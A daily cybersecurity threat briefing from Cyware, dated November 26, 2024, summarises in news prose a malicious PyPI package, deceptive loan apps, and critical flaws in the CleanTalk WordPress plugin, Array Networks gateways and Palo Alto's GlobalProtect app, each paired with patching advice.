We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence, November 26, 2024

shutterstock 2536907273

Daily Threat Briefing Nov 26, 2024

Even trusted repositories aren't immune to compromise, as PyPI users recently learned. The aiocpa package, a Crypto Pay API client downloaded over 12,000 times, was found to contain malicious code in its latest version. The update enabled attackers to steal private keys by sending victims’ API tokens to a Telegram bot, highlighting the risks of even well-used libraries.

A pair of critical vulnerabilities in the CleanTalk WordPress plugin has left over 200,000 websites exposed. Attackers can exploit these flaws to bypass authorization and install malicious plugins or execute arbitrary code. Users are strongly advised to update to the latest version to secure their sites.

Even endpoint protection tools aren't exempt from security gaps. Palo Alto Networks disclosed a flaw in its GlobalProtect app, which allows attackers to connect to unauthorized servers and install malicious root certificates, potentially delivering malware. 

Top Malware Reported in the Last 24 Hours

PyPI library exfiltrates crypto keys

The PyPI repository has quarantined the aiocpa package after discovering that a recent update included malicious code designed to steal private keys via Telegram. The package, which is a Crypto Pay API client, was originally released in September and had been downloaded 12,100 times. The malicious code was found in version 0.1.13 of the library and involved an obfuscated blob of code that captured and transmitted victims' API tokens using a Telegram bot. 

Surge in SpyLoan observed

McAfee found a notable rise in SpyLoan apps, which are deceptive loan applications primarily on Android. These apps, referred to as Potentially Unwanted Programs (PUPs), trick users into divulging sensitive information and granting excessive permissions, potentially leading to extortion and financial losses. The team discovered 15 different loan apps with over eight million installations, mainly operating in South America, Southern Asia, and Africa, utilizing social media for promotion.

Top Vulnerabilities Reported in the Last 24 Hours

200,000 WordPress sites impacted by critical bugs

Critical vulnerabilities in the Anti-Spam by CleanTalk WordPress plugin impact over 200,000 installations. CVE-2024-10542 and CVE-2024-10781 allow attackers to compromise websites by installing malicious plugins and executing code. The first vulnerability involves an authorization bypass due to reverse DNS spoofing, while the second stems from a missing check on empty API keys, enabling unauthorized access. Both vulnerabilities have a severity score of 9.8 and users are urged to update the plugin immediately to version 6.45. 

Patch critical Array Networks, warns CISA

The CISA added a critical security flaw in Array Networks AG and vxAG secure access gateways to its KEV catalog due to reports of active exploitation. The vulnerability (CVE-2023-28461) allows remote code execution by exploiting missing authentication and has been targeted by a China-linked cyberespionage group called Earth Kasha. Federal agencies are urged to apply the patches by December 16.

PoC available for GlobalProtect app flaw

Palo Alto Networks identified a vulnerability (CVE-2024-5921) in its GlobalProtect app, which allows attackers to connect the app to unauthorized servers and install malicious root certificates. This can be used to install malware on endpoints. The vulnerability affects various versions of the GlobalProtect app on Windows, macOS, and Linux. While the company is not aware of any malicious exploitation so far, it advised users to update to version 6. 2. 6 or later on Windows. For other versions, users are advised to use the app in FIPS-CC mode and enforce strict certificate validation during installation to prevent exploitation of this vulnerability.

Related Threat Briefings